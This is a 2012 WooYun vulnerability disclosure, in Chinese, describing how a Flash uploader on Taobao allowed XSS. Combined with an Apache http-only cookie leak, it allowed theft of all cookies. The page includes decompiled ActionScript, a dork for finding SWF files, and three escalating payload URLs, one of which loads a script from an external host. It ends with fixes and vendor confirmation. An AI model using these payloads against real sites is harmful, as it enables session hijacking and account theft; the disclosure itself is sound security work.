当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07085

漏洞标题:淘宝网COOKIES盗取[flash编程安全+apache http-only cookie 泄漏利用]

相关厂商:淘宝网

漏洞作者: gainover

提交时间:2012-05-14 10:46

修复时间:2012-06-28 10:47

公开时间:2012-06-28 10:47

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-14: 细节已通知厂商并且等待厂商处理中
2012-05-14: 厂商已经确认,细节仅向厂商公开
2012-05-24: 细节向核心白帽子及相关领域专家公开
2012-06-03: 细节向普通白帽子公开
2012-06-13: 细节向实习白帽子公开
2012-06-28: 细节向公众公开

简要描述:

昨天测试了新浪微博,今天同样的手法测试淘宝网!
FLASH编程安全问题导致的利用:
http://www.wooyun.org/bugs/wooyun-2012-06103
http://www.wooyun.org/bugs/wooyun-2010-07050
Apache Cookie 泄漏漏洞:
http://www.wooyun.org/bugs/wooyun-2010-06947

详细说明:

一些编程人员,对于loaderInfo.parameters 所传入的参数都不会严格过滤,甚至很多开发人员都有把Javascript函数名作为参数传入的习惯。 比如腾讯的QQ空间这个FLASH( WooYun: QQ空间存储型XSS漏洞(组合利用) )。
新浪的开发人员也有类似的习惯( WooYun: 新浪微博COOKIES盗取[flash编程安全+apache http-only cookie 泄漏利用] )。 淘宝也有~~
利用步骤:
1: google: filetype:swf site:taobao.com,找到淘宝域名下的若干FLASH文件。
2: 反编,并查找 parameters and externalInterface.call
3: 找到一个uploader.swf存在问题。

//正如我说的这种直接把JS函数名传入的情况
    this.javaScriptEventHandler = this.loaderInfo.parameters.eventHandler;
	//后面又用call调用
	 ExternalInterface.call(this.javaScriptEventHandler, this.elementID, event);


4: 构造1级测试代码。证明:JS可以运行

http://upload.taobao.com/static/js/uploader.swf?eventHandler=(function(){alert('xxx');})


5: 构造2级代码,利用href='javascript:"新的页面内容"';突破无法访问document对象的限制。但是无法获取http-only Cookie

http://upload.taobao.com/static/js/uploader.swf?eventHandler=(function(){location.href='javascript:"<script>alert(document.cookie)</script>"'})


6: 构造3级代码,利用Apache Http-only Cookie 泄漏漏洞,获取全部cookies数据。 

http://upload.taobao.com/static/js/uploader.swf?eventHandler=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest4.js%5C'%3E%3C%2Fscript%3E%22'%7D)


自己写了个小检测工具。 检查下 upload.taobao.com

漏洞证明:

1. 打开构造的地址后,效果如下,可获得http-only cookies:


2. upload.taobao.com 确实存在 apache 这个漏洞,见抓包图:


修复方案:

1. 审查已上线的FLASH文件代码,严格控制FLASH文件参数的输入
2. apache的漏洞给打补丁

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-14 12:08

厂商回复:

感谢gainover严谨细致的分析,我们会对这类漏洞进行紧急处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-05-14 10:53 | itianda ( 路人 | Rank:28 漏洞数:4 | 冰冷的天雾湿了谁的眼你不在我身边思...)

    继续膜拜G博士...

  2. 2012-05-14 10:56 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    蛋疼~.~

  3. 2012-05-14 11:04 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    话说这漏洞很怪异,或造成网站禁止上传flash了。。。

  4. 2012-05-14 11:25 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    太淫荡了。

  5. 2012-05-14 14:22 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    神人一个

  6. 2012-05-29 11:01 | 淘宝网(乌云厂商)

    请您留下联系方式,我们会寄礼物给您~~

  7. 2012-05-29 13:04 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @淘宝网 联系方式已发送, 3Q.

  8. 2012-06-28 11:07 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    哈哈,新浪淘宝中招了,好多大站都有这个漏洞

  9. 2012-06-28 12:28 | linxinsnow[N.N.U] ( 实习白帽子 | Rank:40 漏洞数:3 | 网络无限宽广)

    不知道LZ反编swf用的啥工具哦

  10. 2012-06-28 14:18 | Topman王 ( 实习白帽子 | Rank:31 漏洞数:6 | 软件开发工程师!白帽子!XSSER,渗透,SEO)

    好多大站都有这个漏洞

  11. 2012-06-28 16:02 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @gainover 你是不是在腾讯下面的一个公司上班 这漏洞好熟悉呀!!!

  12. 2012-06-28 16:58 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    @linxinsnow[N.N.U] ASV反编译神器

  13. 2014-01-02 09:00 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

    mark